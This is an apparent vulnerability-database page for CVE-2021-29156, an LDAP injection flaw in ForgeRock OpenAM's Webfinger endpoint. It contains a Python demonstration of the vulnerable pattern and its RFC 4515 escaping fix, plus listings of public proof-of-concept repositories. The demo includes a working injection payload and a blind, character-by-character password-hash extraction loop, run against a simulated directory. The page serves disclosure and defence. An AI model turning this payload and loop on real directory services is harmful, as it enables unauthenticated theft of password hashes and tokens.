CVE-2021-29156

Published: 25/03/2021 Updated: 29/03/2021
CVSS v2 Base Score: 5.0 | Impact Score: 2.9 | Exploitability Score: 10.0
CVSS v3 Base Score: 7.5 | Impact Score: 3.6 | Exploitability Score: 3.9
VMScore: 446
CVSS v2 Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N

Vulnerability Summary

ForgeRock OpenAM prior to 13.5.1 allows LDAP injection via the Webfinger protocol: attacker-controlled input from the Webfinger request reaches an LDAP search filter unescaped. Because the endpoint is reachable without authentication and answers differently depending on whether the search matched, an unauthenticated attacker can use it as a true/false oracle to retrieve password hashes character by character, or to retrieve a session token or a private key.
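The pattern behind the summary, as an added illustration (this is not OpenAM code and not either of the proof-of-concept tools listed below). It assumes, for the sake of the example, that the application takes the local part of the Webfinger `resource` parameter (`acct:<local>@<host>`, per RFC 7033) and concatenates it into a filter of the form `(&(objectClass=inetOrgPerson)(uid=<local>))`, answering HTTP 200 when the search matches and 404 otherwise; the attribute names, the directory entries and the hash values are constructed. A small in-memory filter evaluator stands in for the LDAP server so the example runs offline. The vulnerable builder lets a payload close the `uid` item and append a `userPassword=<prefix>*` conjunct, which turns the found/not-found response into a per-character oracle; the hardened builder escapes the RFC 4515 metacharacters so the same payload can only ever be compared as a literal uid.

```python
# Added example: LDAP injection through a Webfinger lookup, and the RFC 4515 fix.
# Not OpenAM code. Filter shape, attribute names and directory contents are assumptions.
import re
import string

# Constructed sample directory; the "hashes" are placeholders, not real password hashes.
ALICE_HASH = "{SSHA}dGVzdC1oYXNoLW9ubHk="
DIRECTORY = [
    {"objectclass": ["inetOrgPerson"], "uid": ["alice"], "userpassword": [ALICE_HASH]},
    {"objectclass": ["inetOrgPerson"], "uid": ["bob"], "userpassword": ["{SSHA}Ym9iLWhhc2g="]},
]
# Characters tried at each position during extraction (covers {SSHA}/base64-style values).
ALPHABET = string.ascii_letters + string.digits + "{}+/=$."


def build_filter_unsafe(local_part):
    """Vulnerable pattern: attacker-controlled text concatenated straight into the filter."""
    return f"(&(objectClass=inetOrgPerson)(uid={local_part}))"


def escape_filter_value(value):
    """RFC 4515 section 3: escape the characters that carry meaning inside a filter value."""
    return "".join(f"\\{ord(ch):02x}" if ch in "*()\\\x00" else ch for ch in value)


def build_filter_safe(local_part):
    """Hardened variant: the local part can only ever be matched as a literal uid."""
    return f"(&(objectClass=inetOrgPerson)(uid={escape_filter_value(local_part)}))"


def _parse(s, i):
    """Recursive-descent parse of an RFC 4515 filter; returns (node, next_index)."""
    if s[i] != "(":
        raise ValueError("expected '('")
    i += 1
    if s[i] in "&|":
        op, children = s[i], []
        i += 1
        while s[i] == "(":
            child, i = _parse(s, i)
            children.append(child)
        if s[i] != ")":
            raise ValueError("unterminated set")
        return (op, children), i + 1
    if s[i] == "!":
        child, i = _parse(s, i + 1)
        if s[i] != ")":
            raise ValueError("unterminated not")
        return ("!", [child]), i + 1
    close = s.index(")", i)              # an unescaped ')' ends a simple item
    eq = s.index("=", i, close)
    attr = s[i:eq].lower()
    pattern = []
    for m in re.finditer(r"\\([0-9a-fA-F]{2})|(\*)|(.)", s[eq + 1:close]):
        if m.group(1):                   # \XX escape: always a literal byte
            pattern.append(re.escape(chr(int(m.group(1), 16))))
        elif m.group(2):                 # bare '*' is the substring wildcard
            pattern.append(".*")
        else:
            pattern.append(re.escape(m.group(3)))
    return ("=", attr, re.compile("".join(pattern) + r"\Z", re.S)), close + 1


def parse_filter(s):
    node, i = _parse(s, 0)
    if i != len(s):
        raise ValueError("trailing data after filter")
    return node


def _matches(node, entry):
    kind = node[0]
    if kind == "&":
        return all(_matches(c, entry) for c in node[1])
    if kind == "|":
        return any(_matches(c, entry) for c in node[1])
    if kind == "!":
        return not _matches(node[1][0], entry)
    _, attr, rx = node
    return any(rx.match(v) for v in entry.get(attr, []))


def webfinger_lookup(resource, build_filter):
    """Oracle: True stands for HTTP 200 (a JRD was returned), False for 404 or a rejected search."""
    if not resource.startswith("acct:"):
        return False
    local_part, _, _host = resource[5:].rpartition("@")
    try:
        node = parse_filter(build_filter(local_part))
    except (ValueError, IndexError):
        return False                     # malformed filter: the server rejects the search
    return any(_matches(node, e) for e in DIRECTORY)


def extract_attribute(build_filter, uid, attr, alphabet=ALPHABET, max_len=128):
    """Blind, character-by-character recovery of `attr` for `uid` through the yes/no oracle.

    Each probe appends a conjunct: (uid=alice)(userPassword=<known><c>*).
    The loop stops when no character extends the recovered prefix.
    """
    known = ""
    for _ in range(max_len):
        for ch in alphabet:
            payload = f"{uid})({attr}={known}{ch}*"
            if webfinger_lookup(f"acct:{payload}@example.com", build_filter):
                known += ch
                break
        else:
            break
    return known


if __name__ == "__main__":
    print("leaked via unsafe filter:", extract_attribute(build_filter_unsafe, "alice", "userPassword"))
    print("leaked via escaped filter:", repr(extract_attribute(build_filter_safe, "alice", "userPassword")))
```

Against the unsafe builder the loop walks the whole hash out of the directory one character at a time; against the escaped builder the very first probe fails and nothing is recovered, while a legitimate `acct:alice@example.com` lookup still resolves. Escaping is the minimum; a real fix also rejects local parts that are not plausible account names before they reach the directory at all.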


Vulnerable Product

forgerock openam

Github Repositories

Proof-of-Concept tool for CVE-2021-29156, an LDAP injection vulnerability in ForgeRock OpenAM v13.0.0.

CVE-2021-29156 Proof-of-Concept
(c) 2021 GuidePoint Security
Charlton Trezevant <charltontrezevant@guidepointsecurity.com>

Background

Today GuidePoint is pleased to release a functional Proof-of-Concept tool for CVE-2021-29156, an LDAP injection vulnerability in ForgeRock OpenAM v13.0.0. This vulnerability allows an attacker to extract a variety of information (such as a user's

Exploit for CVE-2021-29156

CVE-2021-29156 done right

This Proof of Concept was written because the other publicly available PoC is broken. ✨

Install

go install github.com/5amu/CVE-2021-29156@latest

References

nvd.nist.gov/vuln/detail/CVE-2021-29156
portswigger.net/research/hidden-oauth-attack-vectors
github.com/OpenIdentityPlatform/OpenAM/

accuknox-policy-temp

A community-owned library of Kubernetes System and Network policies

AccuKnox Templates overview

Please follow this hierarchy when contributing:

├── cves
│   ├── network
│   │   └── cnp-CVE-2009-0932.yaml
│   ├── system
│   │   └── ksp-CVE-2021-29156.yaml
│   │   └── ksp-CVE-2021-29442.yaml
├──

Community curated list of System and Network policy templates for the KubeArmor and Cilium

Policies Libraries

A community-owned library of Kubernetes System and Network policies

Policy Templates overview

Please follow this hierarchy when contributing:

├── mitre
│   ├── network
│   │   └── cnp-firewall-world-block.yaml
│   ├── system
│   │   └── ksp-postgres-allow.yaml
│   │   └── ksp-privilage-pod-block.yaml